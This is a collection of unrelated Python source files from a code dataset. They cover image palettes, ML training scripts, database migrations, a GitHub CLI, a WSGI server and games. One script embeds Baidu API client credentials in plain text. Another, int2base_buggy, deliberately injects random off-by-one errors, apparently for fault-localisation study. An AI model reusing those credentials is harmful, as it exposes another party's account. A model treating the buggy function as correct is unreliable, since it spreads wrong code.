+{"seq_id":"238048861","text":"import sys\nimport os\nimport argparse\nfrom PIL import Image, ImageDraw, ImageFont\nfrom collections import Counter\n\n# returns an array of the 5 most dominant colors in the image in descending order\n# in (R,G,B) format\ndef get_colors(file):\n\tim = Image.open(file, 'r')\n\twidth, height = im.size\n\tvalues = list(im.getdata())\n\t\n\tif len(values) > 5000:\n\t\tcolors = [val for val, v in Counter(values).most_common(5000)]\n\t\tfinal_colors = [colors[0], colors[1000], colors[3000], colors[4999]]\n\telif len(values) > 500 and len(values) < 5000:\n\t\tcolors = [val for val, v in Counter(values).most_common(1000)]\n\t\tfinal_colors = [colors[0], colors[250], colors[600], colors[900]]\n\telse:\n\t\tcolors = [val for val, v in Counter(values).most_common(4)]\n\t\tfinal_colors = colors\n\treturn final_colors\n\ndef create_palette(colors):\n\tim2 = Image.new(\"RGB\", (400,400))\n\tdraw = ImageDraw.Draw(im2)\n\t\n\t# draw the actual colors\n\tdraw.rectangle((0, 0, 400, 100), fill=colors[0])\n\tdraw.rectangle((0, 100, 400, 200), fill=colors[1])\n\tdraw.rectangle((0, 200, 400, 300), fill=colors[2])\n\tdraw.rectangle((0, 300, 400, 400), fill=colors[3])\n\t\n\tfont = ImageFont.truetype(\"arial.ttf\", 20)\n\n\t# write the R,G,B values of the color on its corresponding color\n\tdraw.text((0, 49), str(colors[0]), font=font, fill=\"white\")\n\tdraw.text((1, 50), str(colors[0]), font=font, fill=\"black\")\n\tdraw.text((0, 149), str(colors[1]), font=font, fill=\"white\")\n\tdraw.text((1, 150), str(colors[1]), font=font, fill=\"black\")\n\tdraw.text((0, 249), str(colors[2]), font=font, fill=\"white\")\n\tdraw.text((1, 250), str(colors[2]), font=font, fill=\"black\")\n\tdraw.text((0, 349), str(colors[3]), font=font, fill=\"white\")\n\tdraw.text((1, 350), str(colors[3]), font=font, fill=\"black\")\n\t\n\tim2.save(\"palette.png\")\n\t\n\tprint(\"Success. View 'palette.png' in the local directory for your colors.\")\n\t\n\nif __name__=='__main__':\n\t# handle argument input\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-i\", \"--image\", help=\"path to the image\", required=True)\n\targs = parser.parse_args()\n\tif args.image:\n\t\tusr_image = args.image\n\t\n\tcolors = get_colors(usr_image)\n\tcreate_palette(colors)\n","sub_path":"Palette-Grab.py","file_name":"Palette-Grab.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"640212059","text":"from keras.layers import Input, LSTM, ConvLSTM2D, Conv3D, BatchNormalization\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam, RMSprop\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras import backend as K\n\ndef get_description():\n desc = [\"4 layers without batch normalizaion:\"]\n desc.append(\"convlstm - 128 filters\")\n desc.append(\"convlstm - 64 filters\")\n desc.append(\"convlstm - 64 filters\")\n desc.append(\"conv3d - 1 filters\")\n desc.append(\"Using mean squared error but saving metrics see if theres\")\n desc.append(\"a difference when using normal convolutional layer\")\n desc.append(\"Removed batch normalization since the batchsize is small\")\n return '\\n'.join(desc)\n\ndef get_model(sequence_length, img_width, img_height):\n model = _build_network(sequence_length, img_width, img_height)\n model.compile(\n loss='mean_squared_error',\n optimizer='adadelta',\n metrics=[\n 'accuracy',\n # 'mean_squared_error',\n 'mean_absolute_error',\n 'mean_absolute_percentage_error',\n 'mean_squared_logarithmic_error',\n 'squared_hinge',\n 'hinge',\n 'logcosh',\n # 'huber_loss',\n 'sparse_categorical_crossentropy',\n 'binary_crossentropy',\n 'kullback_leibler_divergence',\n 'poisson',\n 'cosine_proximity',\n ]\n )\n return model\n\ndef _build_network(sequence_length, img_width, img_height):\n model = Sequential()\n model.add(\n ConvLSTM2D(\n filters=128,\n kernel_size=(3,3),\n input_shape=(sequence_length, img_width, img_height, 1),\n padding='same',\n return_sequences=True,\n )\n )\n model.add(\n ConvLSTM2D(\n filters=64,\n kernel_size=(3,3),\n padding='same',\n return_sequences=True,\n )\n )\n model.add(\n ConvLSTM2D(\n filters=64,\n kernel_size=(3,3),\n padding='same',\n return_sequences=True,\n )\n )\n model.add(\n Conv3D(filters=1,\n kernel_size=(3,3,3),\n activation='sigmoid',\n padding='same',\n data_format='channels_last',\n )\n )\n return model\n\n","sub_path":"models/four-layer-test-3d-layer-no-batch-metrics.py","file_name":"four-layer-test-3d-layer-no-batch-metrics.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"446519642","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('gorod', '0012_auto_20150804_0955'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='userinfo',\n options={'verbose_name': '\\u041f\\u0440\\u043e\\u0444\\u0438\\u043b\\u044c', 'verbose_name_plural': '\\u041f\\u0440\\u043e\\u0444\\u0438\\u043b\\u0438'},\n ),\n migrations.AddField(\n model_name='userinfo',\n name='user',\n field=models.ForeignKey(verbose_name='\\u0427\\u0435\\u043b\\u043e\\u0432\\u0435\\u043a', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"src/gorod/migrations/0013_auto_20150812_1404.py","file_name":"0013_auto_20150812_1404.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"210737638","text":"\"\"\"Updated navigation module with dual language\n\nRevision ID: 3769b81bfaf\nRevises: aeceb6e193\nCreate Date: 2015-07-21 13:49:01.970788\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = '3769b81bfaf'\ndown_revision = 'aeceb6e193'\n\n\ndef upgrade():\n # commands auto generated by Alembic - please adjust! ###\n op.alter_column('nagivation_entry', 'title',\n new_column_name='nl_title',\n existing_type=sa.String(length=256))\n\n op.add_column('nagivation_entry',\n sa.Column('en_title', sa.String(length=256), nullable=True))\n # end Alembic commands ###\n\n\ndef downgrade():\n # commands auto generated by Alembic - please adjust! ###\n op.alter_column('nagivation_entry', 'nl_title',\n new_column_name='title',\n existing_type=sa.String(length=256))\n op.drop_column('nagivation_entry', 'en_title')\n # end Alembic commands ###\n","sub_path":"migrations/versions/2015_07_21_3769b81bfaf_updated_navigation_module_with_dual_.py","file_name":"2015_07_21_3769b81bfaf_updated_navigation_module_with_dual_.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"62261835","text":"import numpy as np\nfrom data.Vertebral_column import load_data_1\nfrom data.common import load_data\n# import trainning_of_adaboost as toa\nimport svm\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, roc_auc_score\nimport trainning_of_adaboost as toa\nfrom sklearn.ensemble import AdaBoostClassifier\n\n\n# X_train, X_test, y_train, y_test = load_data_1(\n # \"data/enable-data/Vertebral_column.csv\", 0.3)\n\nX_train, X_test, y_train, y_test = load_data(\n \"data/enable-data/co_author_08_new.csv\", 0.3)\n\nw, b = svm.fit(X_train, y_train, C=800)\ntest_pred = np.sign(X_test.dot(w)+b)\nprint(classification_report(y_test, test_pred))\nprint(roc_auc_score(y_test, test_pred))\n\nw, b, a = toa.fit(X_train, y_train, M=10, C=800, instance_categorization=False)\ntest_pred = toa.predict(X_test, w, b, a, M=10)\nprint(classification_report(y_test, test_pred))\nprint(roc_auc_score(y_test, test_pred))\n\nw, b, a = toa.fit(X_train, y_train, M=10, C=800, instance_categorization=True)\ntest_pred = toa.predict(X_test, w, b, a, M=10)\nprint(classification_report(y_test, test_pred))\nprint(roc_auc_score(y_test, test_pred))\n\n\n# test SVM\n# model = SVC(kernel='linear', C=100)\n# model.fit(X_train, y_train)\n# test_svmpred = model.predict(X_test)\n# test_accuracy = classification_report(y_test, test_svmpred)\n# print(test_accuracy)\n\n\nclf = AdaBoostClassifier(SVC(kernel='linear', C=800),\n n_estimators=10, algorithm='SAMME')\nclf.fit(X_train, y_train)\ntest_adapred = clf.predict(X_test)\nprint(classification_report(y_test, test_adapred))\nprint(roc_auc_score(y_test, test_adapred))\n","sub_path":"adaboost/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"9710760","text":"# 计算DB指数,暂时没用上\nimport numpy as np\n\ndef euclidean_dist(vec1, vec2):\n return np.sqrt(np.sum(np.square(vec1 - vec2)))\n\ndef avg_dist_intra_cluster(cluster):\n \"\"\"Computes average intra-cluster distance which is neccessary to computer\n DBI.\n Args:\n cluster: An cluster = {x1, x2,..., xk}. xi is a row.\n Returns:\n A float number of average intra-cluster distance.\n \"\"\"\n sigma = 0\n size = cluster.shape[0]\n print (size)\n for i in range(size):\n for j in range(size):\n if i < j:\n sigma += euclidean_dist(cluster[i], cluster[j])\n return 2 * sigma / (size * (size - 1))\n\ndef center_point(cluster):\n center = np.sum(cluster, axis=0) / cluster.shape[0]\n return center\n\ndef dist_inter_cluster(cluster1, cluster2):\n \"\"\"Computes the distance of center points of two clusters.\n Args:\n cluster1, cluster2: An cluster = {x1, x2,..., xk}. xi is a row.\n Returns:\n A float number of average inter-cluster distance.\n \"\"\"\n center1 = center_point(cluster1)\n center2 = center_point(cluster2)\n distance = euclidean_dist(center1, center2)\n return distance\n\n\ndef dbi(cluster1, cluster2):\n \"\"\"Computes the Davies-Boudlin Index of two clusters.\n Args:\n cluster1, cluster2: An cluster = {x1, x2,..., xk}. xi is a row.\n Returns:\n A float number of Davies-Boudlin Index.\n \"\"\"\n index = ((avg_dist_intra_cluster(cluster1) + \n avg_dist_intra_cluster(cluster2)) / \n dist_inter_cluster(cluster1, cluster2))\n return index","sub_path":"backend/algorithm/step/calDB.py","file_name":"calDB.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"581021179","text":"\n\nfrom xai.brain.wordbase.nouns._obscenity import _OBSCENITY\n\n#calss header\nclass _OBSCENITIES(_OBSCENITY, ):\n\tdef __init__(self,): \n\t\t_OBSCENITY.__init__(self)\n\t\tself.name = \"OBSCENITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"obscenity\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_obscenities.py","file_name":"_obscenities.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"507127083","text":"from django.db import models\n\nfrom django.contrib.auth.models import User\n# Create your models here.\nclass Post(models.Model):\n user = models.ForeignKey(User)\n dpicture = models.FileField(upload_to='dogpictures')\n phone = models.IntegerField(null=False)\n body = models.TextField()\n dstatus = models.CharField(max_length=400)\n dbreed = models.CharField(max_length=200)\n dage = models.IntegerField()\n closed = models.BooleanField(default=False)\n datetime = models.DateTimeField(auto_now_add=True)\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"584002800","text":"# encoding:utf-8\n\nimport requests\nimport base64\nimport time\n'''\n增值税发票识别\n'''\n# client_id 为官网获取的AK, client_secret 为官网获取的SK\nhost = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id=mvS45wexdDMRH656dIfdhoN4&client_secret=ylWi4rCGbAGbFDpSOgDpfnCXSyWxGdsB'\nresponse = requests.get(host)\nif response:\n request_url = \"https://aip.baidubce.com/rest/2.0/ocr/v1/vat_invoice\"\n # 二进制方式打开图片文件\n f = open('./data/00001.png', 'rb')\n img = base64.b64encode(f.read())\n\n params = {\"image\":img}\n access_token = response.json()['access_token']\n request_url = request_url + \"?access_token=\" + access_token\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n start = time.time()\n response = requests.post(request_url, data=params, headers=headers)\n if response:\n print (response.json())\n print('time:', time.time() - start)","sub_path":"baidu_api.py","file_name":"baidu_api.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"376211242","text":"# Copyright 2013 Jake Basile\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Interacts with the GitHub User API.\"\"\"\n\nimport ghcl.auth\nimport urlparse\nimport requests\n\ndef init_subparser(subparsers):\n user = subparsers.add_parser('user', help='Interact with users.')\n user_sub = user.add_subparsers(title='User commands')\n who = user_sub.add_parser('who', help='Find out who a user is.')\n who.set_defaults(func=perform_who)\n\ndef perform_who(args):\n token = ghcl.auth.get_token()\n if token == None:\n print('You are not yet logged in.')\n return\n if args.org != None:\n print('Cannot perform this action on an organization.')\n return\n if args.user != None:\n request_url = urlparse.urljoin(args.uri, '/users/{}'.format(args.user))\n else:\n request_url = urlparse.urljoin(args.uri, '/user')\n result = requests.get(\n request_url,\n headers = {\n 'Authorization': 'Bearer ' + token,\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n },\n )\n if result.status_code != 200:\n print('Something went wrong, try again.')\n print(result.reason)\n else:\n resultjson = result.json()\n print('User: {un} ({id})'.format(un=resultjson['login'], id=resultjson['id']))\n print('Name: {}'.format(resultjson['name']))\n print('Company: {}'.format(resultjson['company']))\n print(\n 'Repos: {pub} public / {pri} private'.format(\n pub=resultjson['public_repos'],\n pri=resultjson['total_private_repos'] if args.user == None else 'NA',\n )\n )\n print(\n 'Gists: {pub} public / {pri} private'.format(\n pub=resultjson['public_gists'],\n pri=resultjson['private_gists'] if args.user == None else 'NA',\n )\n )\n\n","sub_path":"ghcl/user/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"279401617","text":"from stable_baselines3.common.env_util import make_atari_env\nfrom stable_baselines3.common.vec_env import VecFrameStack, DummyVecEnv, VecVideoRecorder, VecMonitor\nfrom stable_baselines3.common.monitor import Monitor\nfrom stable_baselines3.common.atari_wrappers import AtariWrapper\nfrom stable_baselines3 import A2C\nfrom stable_baselines3 import DQN\nimport wandb\nfrom wandb.integration.sb3 import WandbCallback\n\n# There already exists an environment generator\n# that will make and wrap atari environments correctly.\n# Here we are also multi-worker training (n_envs=4 => 4 environments)\n\nconfig = {\n \"policy_type\":\"CnnPolicy\",\n \"total_timesteps\":10000,\n \"env_name\":\"PongNoFrameskip-v4\"\n}\n\nrun = wandb.init(\n project=\"dqn_project\",\n config=config,\n sync_tensorboard=True,\n monitor_gym=True,\n save_code=True,\n)\n\ndef make_env():\n env = make_atari_env('PongNoFrameskip-v4')\n #env = AtariWrapper('PongNoFrameskip-v4')\n #env = VecFrameStack(env, n_stack=4)\n #env = VecMonitor(env)\n return env\n\nenv = make_env()\nenv = VecVideoRecorder(env, f\"videos/{run.id}\", record_video_trigger=lambda x: x % 2000 == 0, video_length=200)\n\n# Frame-stacking with 4 frames\n#env = VecFrameStack(env, n_stack=4)\n\nmodel = DQN('CnnPolicy', env, verbose=1, tensorboard_log=f'runs/{run.id}')\nmodel.learn(\n total_timesteps=config[\"total_timesteps\"],\n callback=WandbCallback(\n gradient_save_freq=100,\n model_save_path=f\"models/{run.id}\",\n verbose=2,\n ),\n)\nrun.finish()\n","sub_path":"baselines/simple_baseline.py","file_name":"simple_baseline.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"591978920","text":"import numpy as np \nimport tensorflow as tf\nimport pandas\nimport sys\nimport json\nimport h5py\n\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\n\nimport pdb\n\ntarget_name_dict = {'stat.AP' : 0,\n 'stat.CO' : 1,\n 'stat.ME' : 2,\n 'stat.ML' : 3,\n 'stat.OT' : 4\n }\n\nlabel2target = { v:k for k,v in target_name_dict.items()}\n\nfiles = [\"../data/2015ml.h5\",\n \"../data/2016ml.h5\",\n \"../data/2017ml.h5\",\n \"../data/2018ml.h5\",\n \"../data/2019ml.h5\",\n ]\n\n\nabstracts = []\nlabels = []\nfor f in files:\n\n store = pandas.HDFStore(f)\n #import pdb\n #pdb.set_trace()\n df = store['/df']\n store.close()\n\n abstracts += list(df['abstract'])\n labels = np.hstack([labels,np.array(df['categories'])])\n\n\nlabels = np.asarray([item[0] for item in labels.tolist()])\n\n\nselected_labels = ['stat.AP', 'stat.CO', 'stat.ME', 'stat.ML', 'stat.OT']\n\n\nlabels_selected = np.asarray([item for item in labels.tolist() if item in selected_labels])\n\n\njj = 0 \nabstracts_selected = []\n\n\n\nfor item in labels.tolist(): \n if item in selected_labels:\n abstracts_selected.append(abstracts[jj])\n jj = jj + 1\n \nabstracts_selected = np.asarray(abstracts_selected)\n\n\nprint (np.unique(labels_selected))\nprint(\"---------\")\n\n\nlabels = labels_selected\n\n\n\nfor i in range(2):\n print(abstracts[i])\n print(target_name_dict[labels[i]])\n print(\"---------\")\n\n\nnum_words = 10000\ntokenizer = Tokenizer(num_words=num_words)\ntokenizer.fit_on_texts(abstracts)\nsequences = tokenizer.texts_to_sequences(abstracts)\nseq = pad_sequences(sequences, padding='post', value=0, maxlen=100)\n\n\n\n# Tokenizers come with a convenient list of words and IDs\ndictionary = tokenizer.word_index\n# Let's save this out so we can use it later\nwith open('dictionary_ML.json', 'w') as dictionary_file:\n json.dump(dictionary, dictionary_file)\n\n\n\nnp.random.seed(1234)\nind = np.random.randint(0, len(labels), len(labels))\nprint(ind.shape)\nlabels = labels[ind]\nseq = seq[ind,:]\n\n\n\n\nsplit_1 = int(0.8 * len(labels))\nsplit_2 = int(0.9 * len(labels))\ntrain_labels = labels[:split_1]\ndev_labels = labels[split_1:split_2]\ntest_labels = labels[split_2:]\n\ntrain_seq = seq[:split_1, :]\ndev_seq = seq[split_1:split_2, :]\ntest_seq = seq[split_2:, :]\n\n\n#%%\nvocab_size = 10000\n\n\n#%%\nmodel = keras.Sequential()\nmodel.add(keras.layers.Embedding(vocab_size, 64))\nmodel.add(keras.layers.GlobalAveragePooling1D())\nmodel.add(keras.layers.Dense(64, activation=tf.nn.relu))\nmodel.add(keras.layers.Dense(5, activation=tf.nn.sigmoid))\nmodel.summary()\n\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\n\n\ny_train_num = np.asarray([target_name_dict[x] for x in train_labels.tolist()])\ny_test_num = np.asarray([target_name_dict[x] for x in test_labels.tolist()])\n\ntrain_labels_onehot = to_categorical(y_train_num)\ntest_labels_onehot = to_categorical(y_test_num)\n\nhistory = model.fit(train_seq, train_labels_onehot, epochs=10, steps_per_epoch=32, validation_split=0.3, validation_steps=32)\n\n\n#%%\nev = model.evaluate(test_seq, test_labels_onehot, steps=10)\nprint(ev)\n\n\n#%%\ntext = [\"we present high dispersion spectroscopic data of the compact planetary nebula vy 1 2 where high expansion velocities up to 100 km s are found in the ha n ii and o iii emission lines hst images reveal a bipolar structure vy 1 2 displays a bright ring like structure with a size of 2 4 2 and two faint bipolar lobes in the west east direction a faint pair of knots is also found located almost on opposite sides of the nebula at pa degrees furthermore deep low dispersion spectra are also presented and several emission lines are detected for the first time in this nebula such as the doublet cl iii a k iv a c ii 6461 a the doublet c iv 5801 5812 a by comparison with the solar abundances we find enhanced n depleted c and solar o the central star must have experienced the hot bottom burning cn cycle during the 2nd dredge up phase implying a progenitor star of higher than 3 solar masses the ver\"]\n\n\n#%%\nseq_1 = tokenizer.texts_to_sequences(text)\n\n\n#%%\nseq_2 = pad_sequences(seq_1, padding='post', value=0, maxlen=350)\n\n\n#%%\nprob = model.predict(seq_2)\nprob /= prob.sum()\nprint(prob)\nii = np.argmax(prob)\nprint(label2target[ii])\n\n\n\n# serialize model to JSON\nmodel_json = model.to_json()\nwith open(\"model_ML.json\", \"w\") as json_file:\n json_file.write(model_json)\n\n# serialize weights to HDF5\nmodel.save('model_ML.h5')\n\nprint(\"Saved model to disk\")\n\n\n\n\n\n\n","sub_path":"exploration/train_data.py","file_name":"train_data.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"596497531","text":"#!/usr/bin/env python3\n\"\"\" defines function that concatenates two arrays \"\"\"\n\n\ndef cat_arrays(arr1, arr2):\n \"\"\" returns new list that is the concatenation of two arrays \"\"\"\n cat_array = []\n for i in arr1:\n cat_array.append(i)\n for i in arr2:\n cat_array.append(i)\n return cat_array\n","sub_path":"math/0x00-linear_algebra/6-howdy_partner.py","file_name":"6-howdy_partner.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"452842427","text":"from wsgiref.simple_server import make_server\nfrom cgi import parse_qs, escape\nimport os\n\n\n# 导入我们自己编写的application函数:\ndef application(environ, start_response):\n qs = parse_qs(environ[\"QUERY_STRING\"])\n test=qs.get(\"test\",['unkown'])[0]\n print(test)\n print(\"number\")\n if test == 'some':\n os.system('ls')\n print(\"yes\")\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [b'haha']\n\n\n# 创建一个服务器,IP地址为空,端口是8000,处理函数是application:\nhttpd = make_server('', 8000, application)\nprint('Serving HTTP on port 8000...')\n# 开始监听HTTP请求:\nhttpd.serve_forever()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"112896499","text":"from phi import *\nres_0 = None\nres_2 = None\nres_1 = None\nres_3 = None\ninsert_bug_0 = None\nis_negative_0 = None\nis_negative_1 = None\nis_negative_2 = None\nn_0 = None\nn_1 = None\nn_2 = None\nn_4 = None\nn_3 = None\nn_5 = None\nn_6 = None\nn_7 = None\nn_8 = None\nn_9 = None\nbase_0 = None\nbase_1 = None\ndigit_0 = None\n\nimport string\nfrom random import random\n\n\ndef int2base_buggy(n, base):\n n_0 = n\n base_0 = base\n res_0 = None\n res_2 = None\n res_1 = None\n res_3 = None\n is_negative_0 = None\n is_negative_1 = None\n is_negative_2 = None\n n_1 = None\n n_2 = None\n n_4 = None\n n_3 = None\n n_5 = None\n digit_0 = None\n\n \"\"\"\n :type n: int\n :type base: int\n :rtype: str\n \"\"\"\n is_negative_0 = False\n variables = dict(globals(), ** locals())\n if n_0 == 0:\n return (variables, '0')\n elif n_0 < 0:\n is_negative_1 = True\n n_1 = n_0*-1\n phiPreds = [n_0 == 0, n_0 < 0]\n phiNames = [is_negative_0, is_negative_1, is_negative_0]\n is_negative_2 = phiIf(phiPreds, phiNames)\n phiPreds = [n_0 == 0, n_0 < 0]\n phiNames = [n_0, n_1, n_0]\n n_2 = phiIf(phiPreds, phiNames)\n digit_0 = string.digits+string.ascii_uppercase\n res_0 = ''\n phi0 = Phi()\n while phi0.phiLoopTest(n_2, n_3) > 0:\n phi0.set()\n res_2 = phi0.phiEntry(res_0, res_1)\n n_4 = phi0.phiEntry(n_2, n_3)\n\n res_1 = res_2+digit_0[n_4 % base_0]\n n_3 = buggy(n_4, base_0)\n res_3 = phi0.phiExit(res_0, res_1)\n n_5 = phi0.phiExit(n_2, n_3)\n variables = dict(globals(), ** locals())\n if is_negative_2:\n return (variables, '-'+res_3[::-1])\n else:\n return (variables, res_3[::-1])\n\n\ndef buggy(n, base):\n n_6 = n\n base_1 = base\n insert_bug_0 = None\n n_7 = None\n n_8 = None\n n_9 = None\n\n insert_bug_0 = random() > .5\n if insert_bug_0:\n n_7 = n_6//base_1-1\n else:\n n_8 = n_6//base_1\n phiPreds = [insert_bug_0]\n phiNames = [n_7, n_8]\n n_9 = phiIf(phiPreds, phiNames)\n return n_9\n\n\n# generate python causal map\ncausal_map = dict(n_2=['n_0', 'n_1', 'n_0'], n_1=['n_0'], is_negative_1=[], n_4=['n_2', 'n_3'], res_3=['res_0', 'res_1'], is_negative_2=['is_negative_0', 'is_negative_1', 'is_negative_0'], n_3=['n_4', 'base_0'], res_1=[\n 'res_2', 'digit_0', 'n_4', 'base_0'], is_negative_0=[], res_2=['res_0', 'res_1'], n_5=['n_2', 'n_3'], digit_0=[], n_8=['n_6', 'base_1'], res_0=[], n_7=['n_6', 'base_1'], n_9=['n_7', 'n_8'], insert_bug_0=[],)\n","sub_path":"int2base_tests/int2base_ssa_buggy.py","file_name":"int2base_ssa_buggy.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78775098","text":"\nimport os\nimport sys\nimport librosa\nimport time\n\n\ndef create_audio_descriptors(audio_file, sample_rate, dimension, window, hop):\n y, sr = librosa.load(audio_file, sample_rate)\n mfcc = librosa.feature.mfcc(y, sr=sr, n_mfcc=dimension, n_fft=window, hop_length=hop)\n return mfcc.transpose()\n\n\ndef run_process(audio_file, descriptor_file_name, workspace):\n \n \"\"\"\n if len(sys.argv) > 2:\n audio_file = sys.argv[1]\n descriptor_file_name = sys.argv[2]\n \"\"\"\n sample_rate = 22000 # 44100\n descriptors_per_second = 2\n window = int(sample_rate / descriptors_per_second) # 4096\n hop = window # 4096\n dimension = 32\n\n t0 = time.time()\n descriptors = create_audio_descriptors(audio_file, sample_rate, dimension, window, hop)\n t1 = time.time()\n\n print(f\"{round(t1 - t0, 2)} seconds\")\n print(descriptors.shape)\n\n descriptor_paths = f\"{workspace}descriptors\"\n\n if not os.path.isdir(descriptor_paths):\n os.mkdir(descriptor_paths)\n \n descriptors_file = f\"{descriptor_file_name}_{descriptors_per_second}_{descriptors.shape[0]}.bin\"\n\n descriptors.tofile(f\"{descriptor_paths}/{descriptors_file}\", sep=\"\\n\")\n print(f\"File: {descriptor_paths}/{descriptors_file}\")\n\n\nif __name__ == \"__main__\":\n\n # python audio_descriptor_generator.py {audio path} {descriptor file name}\n\n if len(sys.argv) > 2:\n run_process() \n","sub_path":"audio_descriptor_generator.py","file_name":"audio_descriptor_generator.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"301279299","text":"import os\n\nlist1 = [[None, None, None], [None, None, None], [None, None, None]]\nchecklist = []\nexitlist = []\nos.system(\"clear\")\ni = 0\nwin = False\nround = 0\n\ndef Numbers(num, char):\n\n if num not in checklist:\n checklist.append(num)\n #\n if num == 1:\n if list1[2][0] == None:\n list1[2][0] = char\n elif num == 2:\n if list1[2][1] == None:\n list1[2][1] = char\n elif num == 3:\n if list1[2][2] == None:\n list1[2][2] = char\n #\n elif num == 4:\n if list1[1][0] == None:\n list1[1][0] = char\n elif num == 5:\n if list1[1][1] == None:\n list1[1][1] = char\n elif num == 6:\n if list1[1][2] == None:\n list1[1][2] = char\n #\n elif num == 7:\n if list1[0][0] == None:\n list1[0][0] = char\n elif num == 8:\n if list1[0][1] == None:\n list1[0][1] = char\n elif num == 9:\n if list1[0][2] == None:\n list1[0][2] = char\n\ndef Print_List():\n count = 0\n game = \"\"\n for i in range(len(list1)):\n row = list1[i]\n for j in range(len(row)):\n num = list1[i][j]\n if count == 3:\n count = 0\n game += \"\\n\"\n count += 1\n if num == None:\n game += \"|_|\"\n else:\n game += \"|\" + num + \"|\"\n print(game)\n\ndef Player1():\n while True:\n p1 = input(\"Player 1: \")\n if p1.isdigit() == True and len(checklist) >= 1 and int(p1) in checklist:\n print(\"You can't place that here.\")\n return Player1()\n elif str(p1).isdigit() == True and int(p1) >= 1 and int(p1) <= 9:\n break\n else:\n print(\"Wrong input!\")\n\n Numbers(int(p1), \"X\")\n os.system(\"clear\")\n Print_List()\n\n if round >= 5:\n Check_Winner(1, \"X\")\n\ndef Player2():\n while True:\n p2 = input(\"Player 2: \")\n if p2.isdigit() == True and len(checklist) >= 1 and int(p2) in checklist:\n print(\"You can't place that here.\")\n return Player2()\n #\n elif str(p2).isdigit() == True and int(p2) >= 1 and int(p2) <= 9:\n break\n else:\n print(\"Wrong input!\")\n\n Numbers(int(p2), \"O\")\n os.system(\"clear\")\n Print_List()\n\n if round >= 5:\n Check_Winner(2, \"O\")\n\n\ndef Win(p):\n print(\"Player\" + str(p) + \"Wins!\")\n\ndef Check_Tie():\n if (None in list1[0]) == False and (None in list1[1]) == False and (None in list1[2]) == False:\n print(\"TIE!\")\n exitlist.append(1)\n\n\ndef Check_Winner(p, char):\n Check_Tie()\n if list1[0][0] == char and list1[0][1] == char and list1[0][2] == char:\n Win(p)\n exitlist.append(1)\n elif list1[1][0] == char and list1[1][1] == char and list1[1][2] == char:\n Win(p)\n exitlist.append(1)\n elif list1[2][0] == char and list1[2][1] == char and list1[2][2] == char:\n Win(p)\n exitlist.append(1)\n #\n elif list1[0][0] == char and list1[1][0] == char and list1[2][0] == char:\n Win(p)\n 